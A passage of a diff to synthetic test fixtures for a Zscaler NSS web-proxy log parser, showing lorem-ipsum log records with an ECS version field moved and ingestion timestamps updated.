iPhone OS 13_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 LightSpeed [FBAN/MessengerLiteForiOS;FBAV/266.0.0.32.114;FBBV/216059178;FBDV/iPhone10,6;FBMD/iPhone;FBSN/iOS;FBSV/13.4.1;FBSS/3;FBCR/;FBID/phone;FBLC/en_US;FBOP/0]^^department=gitsed^^user=estla^^event_id=ione^^clienttranstime=ecillum^^requestmethod=maccu^^requestsize=5298^^requestversion=quisquam^^status=boreet^^responsesize=620^^responseversion=Malorumw^^transactionsize=5212", "event": { - "ingested": "2021-06-14T08:26:19.845153800Z" + "ingested": "2021-12-14T14:59:54.590748204Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "issu ZSCALERNSS: time=tconsect Nov 23 9:15:06 2018^^timezone=OMST^^action=Allowed^^reason=unknown^^hostname=agna5654.www.corp^^protocol=tcp^^serverip=10.200.74.101^^url=https://example.com/nonproi/dolor.jpg?molli=oeiusm#aUtenim^^urlcategory=ntincul^^urlclass=nnumquam^^dlpdictionaries=etdol^^dlpengine=sed^^filetype=uep^^threatcategory=ametco^^threatclass=nde^^pagerisk=reprehe^^threatname=umdolo^^clientpublicIP=duntutl^^ClientIP=10.203.47.23^^location=empor^^refererURL=https://mail.example.net/teveli/utperspi.html?luptate=aturvel#ostrumex^^useragent=Mozilla/5.0 (Linux; Android 10; SM-A305FN Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.96 Mobile Safari/537.36 YandexSearch/8.10 YandexSearchBrowser/8.10^^department=sedquia^^user=litesse^^event_id=ntmo^^clienttranstime=aliqu^^requestmethod=iqu^^requestsize=4429^^requestversion=ationula^^status=doconse^^responsesize=4822^^responseversion=oreeufug^^transactionsize=5020", "event": { - "ingested": "2021-06-14T08:26:19.845158400Z" + "ingested": "2021-12-14T14:59:54.590748599Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "tenima ZSCALERNSS: time=emagnam Dec 7 4:17:40 
2018^^timezone=CT^^action=Blocked^^reason=success^^hostname=ites5711.internal.host^^protocol=ggp^^serverip=10.162.78.48^^url=https://example.com/sedqui/iuntNe.gif?epteu=nvent#uepor^^urlcategory=umSecti^^urlclass=eabil^^dlpdictionaries=ibusB^^dlpengine=rporis^^filetype=etco^^threatcategory=mip^^threatclass=ereprehe^^pagerisk=olu^^threatname=nofdeF^^clientpublicIP=riaturEx^^ClientIP=10.24.23.209^^location=itautfu^^refererURL=https://internal.example.org/ole/odi.txt?mporain=ectetur#adipisc^^useragent=Mozilla/5.0 (Linux; Android 9; U307AS) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36^^department=iumd^^user=ntore^^event_id=tect^^clienttranstime=ion^^requestmethod=tutl^^requestsize=3811^^requestversion=bor^^status=ameaquei^^responsesize=4147^^responseversion=uelaud^^transactionsize=1306", "event": { - "ingested": "2021-06-14T08:26:19.845162900Z" + "ingested": "2021-12-14T14:59:54.590749050Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ngelit ZSCALERNSS: time=quiano Dec 21 11:20:14 2018^^timezone=GMT+02:00^^action=Allowed^^reason=success^^hostname=oluptat2848.api.home^^protocol=igmp^^serverip=10.55.151.53^^url=https://www5.example.net/lits/Nemoen.txt?elillu=seruntmo#imidest^^urlcategory=oeiusmod^^urlclass=uidolore^^dlpdictionaries=iacon^^dlpengine=ncu^^filetype=quaturve^^threatcategory=ciad^^threatclass=diconseq^^pagerisk=utod^^threatname=ostr^^clientpublicIP=amcorp^^ClientIP=10.211.66.68^^location=uptatem^^refererURL=https://mail.example.org/nproide/mali.htm?siutali=mfugi#ceroinBC^^useragent=Mozilla/5.0 (Linux; Android 9; G8142) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36^^department=maveni^^user=squir^^event_id=commod^^clienttranstime=umqu^^requestmethod=umet^^requestsize=5891^^requestversion=amestqu^^status=aliqua^^responsesize=1782^^responseversion=teirure^^transactionsize=1210", "event": { - "ingested": 
"2021-06-14T08:26:19.845167500Z" + "ingested": "2021-12-14T14:59:54.590749563Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "dipisciv ZSCALERNSS: time=nsequun Jan 5 6:22:49 2019^^timezone=ET^^action=Blocked^^reason=unknown^^hostname=ngelitse7535.internal.lan^^protocol=rdp^^serverip=10.110.16.169^^url=https://example.org/eius/evo.jpg?iarchit=volupt#ipis^^urlcategory=usBonor^^urlclass=mide^^dlpdictionaries=sten^^dlpengine=enderi^^filetype=labore^^threatcategory=uasiarch^^threatclass=iamquisn^^pagerisk=magnama^^threatname=reprehe^^clientpublicIP=citatio^^ClientIP=10.209.203.156^^location=esciunt^^refererURL=https://www.example.com/liquide/BCSedut.htm?litani=temse#samvo^^useragent=Mozilla/5.0 (Linux; Android 9; G8142) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36^^department=roinBCSe^^user=mes^^event_id=labori^^clienttranstime=ditau^^requestmethod=lupta^^requestsize=6650^^requestversion=tam^^status=olu^^responsesize=409^^responseversion=iut^^transactionsize=3808", "event": { - "ingested": "2021-06-14T08:26:19.845172500Z" + "ingested": "2021-12-14T14:59:54.590750003Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "deser ZSCALERNSS: time=boris Jan 19 1:25:23 2019^^timezone=PST^^action=Allowed^^reason=success^^hostname=tiumtot3611.internal.localdomain^^protocol=udp^^serverip=10.84.9.150^^url=https://www5.example.net/equun/veli.gif?tem=iadeseru#uiineavo^^urlcategory=enimadmi^^urlclass=qui^^dlpdictionaries=ita^^dlpengine=lamco^^filetype=natuser^^threatcategory=Excepteu^^threatclass=omnis^^pagerisk=tati^^threatname=orinc^^clientpublicIP=teursi^^ClientIP=10.107.68.114^^location=nofdeFin^^refererURL=https://internal.example.org/ollit/umfug.htm?lumquid=Sectio#tiumdol^^useragent=Mozilla/5.0 (Linux; Android 9; LG-US998) AppleWebKit/537.36 (KHTML, like Gecko) 
Chrome/83.0.4103.83 Mobile Safari/537.36^^department=ocons^^user=sequatDu^^event_id=nsecte^^clienttranstime=pta^^requestmethod=uianonnu^^requestsize=5724^^requestversion=veleumi^^status=volupt^^responsesize=6822^^responseversion=itatise^^transactionsize=3714", "event": { - "ingested": "2021-06-14T08:26:19.845177300Z" + "ingested": "2021-12-14T14:59:54.590750392Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "userro ZSCALERNSS: time=oree Feb 2 8:27:57 2019^^timezone=CEST^^action=Blocked^^reason=failure^^hostname=gnaa4656.api.example^^protocol=igmp^^serverip=10.26.222.144^^url=https://internal.example.com/ecatcu/tMalo.txt?nse=rauto#rese^^urlcategory=nonproi^^urlclass=doconse^^dlpdictionaries=henderi^^dlpengine=tisunde^^filetype=ende^^threatcategory=quidolor^^threatclass=lloin^^pagerisk=eomnis^^threatname=proiden^^clientpublicIP=moenimip^^ClientIP=10.124.119.48^^location=atquo^^refererURL=https://www.example.com/ern/ationula.jpg?nsequun=ateveli#aqua^^useragent=Mozilla/5.0 (Linux; Android 10; SM-A305FN Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.96 Mobile Safari/537.36 YandexSearch/8.10 YandexSearchBrowser/8.10^^department=amn^^user=nre^^event_id=sintoc^^clienttranstime=rinci^^requestmethod=ici^^requestsize=7328^^requestversion=Nequepor^^status=aUten^^responsesize=4127^^responseversion=tatnon^^transactionsize=977", "event": { - "ingested": "2021-06-14T08:26:19.845181900Z" + "ingested": "2021-12-14T14:59:54.590750889Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "mnisis ZSCALERNSS: time=onsequa Feb 17 3:30:32 
2019^^timezone=GMT+02:00^^action=Allowed^^reason=failure^^hostname=psaqu6066.www5.localhost^^protocol=ipv6-icmp^^serverip=10.164.190.2^^url=https://mail.example.org/ntutlabo/leumiure.htm?eacommo=amqua#tionevol^^urlcategory=itvo^^urlclass=asi^^dlpdictionaries=tobe^^dlpengine=ssequa^^filetype=emp^^threatcategory=emoeni^^threatclass=officiad^^pagerisk=veniam^^threatname=labo^^clientpublicIP=ssecill^^ClientIP=10.223.11.164^^location=tate^^refererURL=https://internal.example.net/ali/ionu.txt?cte=ariatu#ess^^useragent=Mozilla/5.0 (Linux; Android 10; LM-V350) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36^^department=risnisiu^^user=ten^^event_id=datatno^^clienttranstime=equepor^^requestmethod=antium^^requestsize=5241^^requestversion=texp^^status=mvolup^^responsesize=4382^^responseversion=ema^^transactionsize=6673", "event": { - "ingested": "2021-06-14T08:26:19.845186700Z" + "ingested": "2021-12-14T14:59:54.590751283Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "nsec ZSCALERNSS: time=iaeco Mar 3 10:33:06 2019^^timezone=OMST^^action=Blocked^^reason=failure^^hostname=iavol5202.api.example^^protocol=udp^^serverip=10.14.37.8^^url=https://www.example.org/ugitsed/ritatis.jpg?xplic=stenat#mquis^^urlcategory=rume^^urlclass=samnisiu^^dlpdictionaries=yCiceroi^^dlpengine=evolupta^^filetype=citat^^threatcategory=prehende^^threatclass=vitaedic^^pagerisk=remip^^threatname=rsita^^clientpublicIP=rehe^^ClientIP=10.121.181.243^^location=midest^^refererURL=https://example.org/olupta/modi.txt?rnatur=tseddo#utaliq^^useragent=Mozilla/5.0 (Linux; Android 6.0; Lenovo A2016a40 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.106 Mobile Safari/537.36 YaApp_Android/10.30 
YaSearchBrowser/10.30^^department=errorsi^^user=umwr^^event_id=olor^^clienttranstime=cupida^^requestmethod=rinc^^requestsize=7719^^requestversion=roqu^^status=dquia^^responsesize=1460^^responseversion=strude^^transactionsize=6667", "event": { - "ingested": "2021-06-14T08:26:19.845191500Z" + "ingested": "2021-12-14T14:59:54.590751689Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ptate ZSCALERNSS: time=oloreeu Mar 17 5:35:40 2019^^timezone=ET^^action=Blocked^^reason=success^^hostname=uame1361.api.local^^protocol=udp^^serverip=10.90.20.202^^url=https://mail.example.com/aute/dictasu.gif?ptas=iadolo#cidu^^urlcategory=nonp^^urlclass=abillo^^dlpdictionaries=tinv^^dlpengine=iar^^filetype=nse^^threatcategory=turQuis^^threatclass=tat^^pagerisk=pta^^threatname=henderi^^clientpublicIP=onsec^^ClientIP=10.10.93.133^^location=tau^^refererURL=https://www.example.net/urad/upt.gif?sitamet=xerc#mcolabor^^useragent=Mozilla/5.0 (Linux; Android 9; ZTE Blade V1000RU Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Mobile Safari/537.36 YaApp_Android/10.91 YaSearchBrowser/10.91^^department=quipe^^user=evita^^event_id=ostrude^^clienttranstime=itsed^^requestmethod=nia^^requestsize=7548^^requestversion=rehe^^status=eseosqu^^responsesize=3488^^responseversion=sundeo^^transactionsize=3076", "event": { - "ingested": "2021-06-14T08:26:19.845196100Z" + "ingested": "2021-12-14T14:59:54.590752076Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "laud ZSCALERNSS: time=uido Apr 1 12:38:14 
2019^^timezone=ET^^action=Allowed^^reason=success^^hostname=rsitame4049.internal.corp^^protocol=tcp^^serverip=10.34.98.144^^url=https://mail.example.net/enbyCic/aturau.gif?orroqui=sci#psamvolu^^urlcategory=itsedqui^^urlclass=oreve^^dlpdictionaries=omn^^dlpengine=onevol^^filetype=ese^^threatcategory=reprehen^^threatclass=Exce^^pagerisk=tocca^^threatname=tinvolu^^clientpublicIP=ecatc^^ClientIP=10.77.102.206^^location=quin^^refererURL=https://api.example.com/sedqui/ueporroq.htm?eetdol=tia#lup^^useragent=Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 YaBrowser/20.3.0.2221 Yowser/2.5 Safari/537.36^^department=inBCSed^^user=tectobe^^event_id=pariatu^^clienttranstime=uiacons^^requestmethod=ulapa^^requestsize=4143^^requestversion=henderit^^status=ident^^responsesize=4610^^responseversion=mquae^^transactionsize=1789", "event": { - "ingested": "2021-06-14T08:26:19.845200600Z" + "ingested": "2021-12-14T14:59:54.590753266Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "lit ZSCALERNSS: time=uiine Apr 15 7:40:49 2019^^timezone=ET^^action=Blocked^^reason=unknown^^hostname=elit912.www5.test^^protocol=udp^^serverip=10.176.233.249^^url=https://example.org/olu/mqua.txt?mdolore=ita#aeratvol^^urlcategory=odite^^urlclass=atn^^dlpdictionaries=sectet^^dlpengine=boreetd^^filetype=ueporro^^threatcategory=cto^^threatclass=essequa^^pagerisk=gnidolor^^threatname=itlabori^^clientpublicIP=amestqui^^ClientIP=10.75.144.118^^location=qua^^refererURL=https://api.example.com/pteurs/intocc.gif?veni=turmag#dutper^^useragent=Mozilla/5.0 (Linux; Android 8.0.0; VS996) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36^^department=aconseq^^user=isnos^^event_id=ntin^^clienttranstime=tenatus^^requestmethod=odic^^requestsize=3588^^requestversion=intocca^^status=equuntu^^responsesize=3976^^responseversion=ine^^transactionsize=3409", 
"event": { - "ingested": "2021-06-14T08:26:19.845205300Z" + "ingested": "2021-12-14T14:59:54.590753804Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "rcit ZSCALERNSS: time=secte Apr 29 2:43:23 2019^^timezone=GMT-07:00^^action=Allowed^^reason=unknown^^hostname=tat6671.www.local^^protocol=udp^^serverip=10.149.6.107^^url=https://api.example.net/mnisiut/eabil.jpg?psumqui=trude#ccusa^^urlcategory=ndeomni^^urlclass=chite^^dlpdictionaries=obeatae^^dlpengine=rehen^^filetype=uam^^threatcategory=vitaedi^^threatclass=uis^^pagerisk=emagnaal^^threatname=uunturm^^clientpublicIP=nonnumq^^ClientIP=10.236.55.236^^location=aerat^^refererURL=https://www.example.org/eata/maliquam.jpg?gnamali=olabor#ionem^^useragent=Mozilla/5.0 (Linux; Android 10; LM-V350) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36^^department=eseosqu^^user=redolo^^event_id=mveleu^^clienttranstime=cillumdo^^requestmethod=mvele^^requestsize=4686^^requestversion=isnost^^status=lumdolor^^responsesize=559^^responseversion=aspe^^transactionsize=4318", "event": { - "ingested": "2021-06-14T08:26:19.845209500Z" + "ingested": "2021-12-14T14:59:54.590754196Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "erita ZSCALERNSS: time=eursint May 13 9:45:57 2019^^timezone=CET^^action=Blocked^^reason=failure^^hostname=uis5050.www.local^^protocol=igmp^^serverip=10.97.202.149^^url=https://api.example.net/uamestq/eetdol.html?ctionofd=uianonnu#ntNeque^^urlcategory=magnidol^^urlclass=meumfug^^dlpdictionaries=irat^^dlpengine=uatu^^filetype=gel^^threatcategory=modt^^threatclass=atcupi^^pagerisk=xeacomm^^threatname=tla^^clientpublicIP=itaspe^^ClientIP=10.13.125.101^^location=uisautei^^refererURL=https://mail.example.net/ihilmol/scinge.jpg?str=yCiceroi#loremeu^^useragent=Mozilla/5.0 (Linux; Android 4.1.2; Micromax P410i Build/JZO54K) 
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36^^department=velitess^^user=colab^^event_id=itte^^clienttranstime=niamquis^^requestmethod=uaUten^^requestsize=7772^^requestversion=exeacomm^^status=uptat^^responsesize=982^^responseversion=ore^^transactionsize=7330", "event": { - "ingested": "2021-06-14T08:26:19.845214Z" + "ingested": "2021-12-14T14:59:54.590754587Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "poriss ZSCALERNSS: time=enatus May 28 4:48:31 2019^^timezone=GMT+02:00^^action=Blocked^^reason=failure^^hostname=ficiad1312.api.host^^protocol=igmp^^serverip=10.141.66.163^^url=https://mail.example.net/ius/msequ.jpg?ptat=tionula#gnido^^urlcategory=usmo^^urlclass=squirati^^dlpdictionaries=uasi^^dlpengine=quaeabi^^filetype=sequ^^threatcategory=gna^^threatclass=itautf^^pagerisk=aev^^threatname=uovolup^^clientpublicIP=tMaloru^^ClientIP=10.230.61.102^^location=rautod^^refererURL=https://example.net/minimav/uovo.html?orinrep=tNequ#eca^^useragent=Mozilla/5.0 (Linux; Android 6.0; ZTE BLADE V7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36^^department=serr^^user=umdolo^^event_id=iduntut^^clienttranstime=admini^^requestmethod=mini^^requestsize=3181^^requestversion=cididun^^status=iamqu^^responsesize=1324^^responseversion=iunt^^transactionsize=2218", "event": { - "ingested": "2021-06-14T08:26:19.845219400Z" + "ingested": "2021-12-14T14:59:54.590754984Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "uisaut ZSCALERNSS: time=apar Jun 11 11:51:06 
2019^^timezone=OMST^^action=Blocked^^reason=unknown^^hostname=itaspe921.mail.invalid^^protocol=tcp^^serverip=10.10.25.145^^url=https://www.example.org/iat/acom.html?umdolo=oluptass#umqu^^urlcategory=rsitam^^urlclass=aliqui^^dlpdictionaries=uipexea^^dlpengine=sauteiru^^filetype=nibusB^^threatcategory=eetdolo^^threatclass=issuscip^^pagerisk=iduntu^^threatname=nde^^clientpublicIP=naturau^^ClientIP=10.224.249.228^^location=odit^^refererURL=https://www5.example.net/lapa/enia.jpg?deserun=ugia#isiuta^^useragent=Mozilla/5.0 (Linux; Android 10; LM-V350) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36^^department=ugiatq^^user=mnisiuta^^event_id=nrepre^^clienttranstime=eumfu^^requestmethod=remap^^requestsize=1954^^requestversion=yCicero^^status=dqui^^responsesize=6666^^responseversion=oin^^transactionsize=3838", "event": { - "ingested": "2021-06-14T08:26:19.845224500Z" + "ingested": "2021-12-14T14:59:54.590755580Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "eiusm ZSCALERNSS: time=assit Jun 25 6:53:40 2019^^timezone=PT^^action=Blocked^^reason=unknown^^hostname=archite4407.mail.invalid^^protocol=ipv6-icmp^^serverip=10.234.34.40^^url=https://www.example.com/onorum/umiure.gif?lites=admini#trumexer^^urlcategory=maveniam^^urlclass=ctobeat^^dlpdictionaries=emoenim^^dlpengine=oqui^^filetype=olab^^threatcategory=remagnam^^threatclass=neavolu^^pagerisk=adipi^^threatname=idid^^clientpublicIP=ela^^ClientIP=10.247.255.107^^location=lore^^refererURL=https://www5.example.org/olorsi/everitat.htm?iamq=ercitat#velillu^^useragent=Mozilla/5.0 (Linux; Android 9; Notepad_K10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Safari/537.36^^department=elitsed^^user=aeabillo^^event_id=dolori^^clienttranstime=mco^^requestmethod=nofdeF^^requestsize=245^^requestversion=writt^^status=ent^^responsesize=3750^^responseversion=uaer^^transactionsize=2304", "event": { - 
"ingested": "2021-06-14T08:26:19.845229Z" + "ingested": "2021-12-14T14:59:54.590755964Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "tectobe ZSCALERNSS: time=ain Jul 10 1:56:14 2019^^timezone=OMST^^action=Blocked^^reason=success^^hostname=aria1424.mail.home^^protocol=igmp^^serverip=10.124.81.20^^url=https://mail.example.org/veni/rspi.htm?ntium=imadmi#dquiac^^urlcategory=liquide^^urlclass=uatD^^dlpdictionaries=reh^^dlpengine=uel^^filetype=tmollit^^threatcategory=ametco^^threatclass=ilmoles^^pagerisk=xeaco^^threatname=texpl^^clientpublicIP=tqua^^ClientIP=10.250.102.42^^location=totamr^^refererURL=https://internal.example.com/iciat/uira.htm?cti=orsitvo#elit^^useragent=Mozilla/5.0 (Linux; Android 9; Pixel 3 Build/PD1A.180720.030) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.158 Mobile Safari/537.36^^department=tenby^^user=tNequ^^event_id=piciatis^^clienttranstime=ritten^^requestmethod=tatisetq^^requestsize=2753^^requestversion=madmi^^status=icia^^responsesize=412^^responseversion=eroi^^transactionsize=2077", "event": { - "ingested": "2021-06-14T08:26:19.845233600Z" + "ingested": "2021-12-14T14:59:54.590756351Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "riatur ZSCALERNSS: time=amrema Jul 24 8:58:48 2019^^timezone=OMST^^action=Allowed^^reason=unknown^^hostname=Bonoru7444.www5.example^^protocol=rdp^^serverip=10.166.205.159^^url=https://www.example.com/tem/litsedq.htm?ium=utfugit#beat^^urlcategory=odita^^urlclass=borisn^^dlpdictionaries=itanimid^^dlpengine=ianonnum^^filetype=cte^^threatcategory=iratio^^threatclass=proid^^pagerisk=inculp^^threatname=atnu^^clientpublicIP=ntmo^^ClientIP=10.154.188.132^^location=atevelit^^refererURL=https://internal.example.com/iconsequ/adipisci.txt?gnido=iamq#Utenim^^useragent=Mozilla/5.0 (compatible; Yahoo Ad monitoring; 
https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) yahoo.adquality.lwd.desktop/1591143192-10^^department=uisa^^user=uptat^^event_id=siutal^^clienttranstime=umetMalo^^requestmethod=onevolu^^requestsize=4181^^requestversion=sedquian^^status=involu^^responsesize=5294^^responseversion=nsequatD^^transactionsize=7089", "event": { - "ingested": "2021-06-14T08:26:19.845238Z" + "ingested": "2021-12-14T14:59:54.590756735Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "liquid ZSCALERNSS: time=uamq Aug 7 4:01:23 2019^^timezone=CEST^^action=Allowed^^reason=success^^hostname=icero1297.internal.domain^^protocol=ipv6-icmp^^serverip=10.46.71.46^^url=https://www.example.com/amcola/eumiurer.gif?stiaeco=equu#laborisn^^urlcategory=atisetq^^urlclass=mSectio^^dlpdictionaries=rsinto^^dlpengine=nonnumqu^^filetype=atis^^threatcategory=todit^^threatclass=upta^^pagerisk=fug^^threatname=ulpaq^^clientpublicIP=rured^^ClientIP=10.138.193.38^^location=udex^^refererURL=https://api.example.com/uin/isci.htm?nsectetu=spici#untutl^^useragent=Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) yahoo.adquality.lwd.desktop/1591143192-10^^department=tate^^user=sintocca^^event_id=ugiat^^clienttranstime=asuntex^^requestmethod=uovolup^^requestsize=745^^requestversion=amali^^status=uiav^^responsesize=274^^responseversion=mullamco^^transactionsize=7843", "event": { - "ingested": "2021-06-14T08:26:19.845242200Z" + "ingested": "2021-12-14T14:59:54.590757130Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ons ZSCALERNSS: time=radip Aug 21 11:03:57 
2019^^timezone=CT^^action=Blocked^^reason=unknown^^hostname=oloremeu5047.www5.invalid^^protocol=tcp^^serverip=10.254.119.31^^url=https://api.example.net/sedquian/lamcorpo.html?sequatD=Nequepo#veleum^^urlcategory=eturad^^urlclass=tor^^dlpdictionaries=hender^^dlpengine=moditemp^^filetype=pitlab^^threatcategory=tutlabor^^threatclass=imadmi^^pagerisk=nculp^^threatname=quamnihi^^clientpublicIP=nimadmi^^ClientIP=10.172.159.251^^location=nima^^refererURL=https://mail.example.org/tur/tlaboru.htm?tutlabo=incid#der^^useragent=Mozilla/5.0 (Linux; Android 6.0; U20 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.147 Mobile Safari/537.36 YaApp_Android/10.90 YaSearchBrowser/10.90^^department=tconsect^^user=usm^^event_id=uunturma^^clienttranstime=namaliqu^^requestmethod=tatemacc^^requestsize=2324^^requestversion=nor^^status=saut^^responsesize=2804^^responseversion=stiaeco^^transactionsize=1508", "event": { - "ingested": "2021-06-14T08:26:19.845246200Z" + "ingested": "2021-12-14T14:59:54.590757591Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "osam ZSCALERNSS: time=ncid Sep 5 6:06:31 2019^^timezone=PT^^action=Allowed^^reason=unknown^^hostname=edutpe1255.internal.lan^^protocol=ipv6-icmp^^serverip=10.195.62.230^^url=https://www5.example.com/ictasun/iumto.txt?erro=admin#uisnostr^^urlcategory=nemul^^urlclass=amqua^^dlpdictionaries=isnost^^dlpengine=eaco^^filetype=oremeu^^threatcategory=uis^^threatclass=isnost^^pagerisk=itvolu^^threatname=citation^^clientpublicIP=spernatu^^ClientIP=10.98.126.206^^location=tion^^refererURL=https://internal.example.org/uidolore/uatDuisa.htm?uipe=alo#ufugia^^useragent=Mozilla/5.0 (Linux; Android 10; SM-A715F Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/83.0.4103.83 Mobile Safari/537.36 
[FB_IAB/Orca-Android;FBAV/266.0.0.16.117;]^^department=atatnonp^^user=ptassit^^event_id=sequat^^clienttranstime=Uteni^^requestmethod=oriosa^^requestsize=7244^^requestversion=temporai^^status=totamrem^^responsesize=4957^^responseversion=dminimve^^transactionsize=1182", "event": { - "ingested": "2021-06-14T08:26:19.845250300Z" + "ingested": "2021-12-14T14:59:54.590757983Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "idolo ZSCALERNSS: time=citat Sep 19 1:09:05 2019^^timezone=PT^^action=Blocked^^reason=unknown^^hostname=nderit1171.www5.domain^^protocol=rdp^^serverip=10.144.93.186^^url=https://www5.example.org/oriosa/ssusc.htm?atemacc=rsitvolu#isi^^urlcategory=umquia^^urlclass=evolu^^dlpdictionaries=quidolo^^dlpengine=utlabore^^filetype=texplica^^threatcategory=boru^^threatclass=ntut^^pagerisk=elaud^^threatname=acomm^^clientpublicIP=edquia^^ClientIP=10.84.140.5^^location=laboris^^refererURL=https://www.example.org/lpaquiof/isisten.txt?culp=Ciceroin#aeco^^useragent=Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 YaBrowser/20.3.0.2221 Yowser/2.5 Safari/537.36^^department=mull^^user=eroi^^event_id=adminim^^clienttranstime=naturau^^requestmethod=nima^^requestsize=4943^^requestversion=sed^^status=mUten^^responsesize=6658^^responseversion=tfugitse^^transactionsize=6480", "event": { - "ingested": "2021-06-14T08:26:19.845254300Z" + "ingested": "2021-12-14T14:59:54.590758385Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "uianon ZSCALERNSS: time=iutal Oct 3 8:11:40 
2019^^timezone=ET^^action=Allowed^^reason=success^^hostname=nos4114.api.lan^^protocol=rdp^^serverip=10.31.58.6^^url=https://mail.example.net/tseddoei/byCi.gif?assitas=nul#ame^^urlcategory=lites^^urlclass=sec^^dlpdictionaries=aqua^^dlpengine=meumf^^filetype=olu^^threatcategory=ectet^^threatclass=tquovo^^pagerisk=orev^^threatname=lapa^^clientpublicIP=xeacom^^ClientIP=10.198.84.190^^location=henderi^^refererURL=https://mail.example.com/dminim/sse.gif?equ=turvelil#lor^^useragent=Mozilla/5.0 (Linux; Android 5.1.1; Android Build/LMY47V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Mobile Safari/537.36 YaApp_Android/9.80 YaSearchBrowser/9.80^^department=ern^^user=unt^^event_id=volu^^clienttranstime=iineavo^^requestmethod=qua^^requestsize=6831^^requestversion=tenbyC^^status=xeacomm^^responsesize=6855^^responseversion=psu^^transactionsize=5856", "event": { - "ingested": "2021-06-14T08:26:19.845258400Z" + "ingested": "2021-12-14T14:59:54.590758778Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ept ZSCALERNSS: time=nem Oct 18 3:14:14 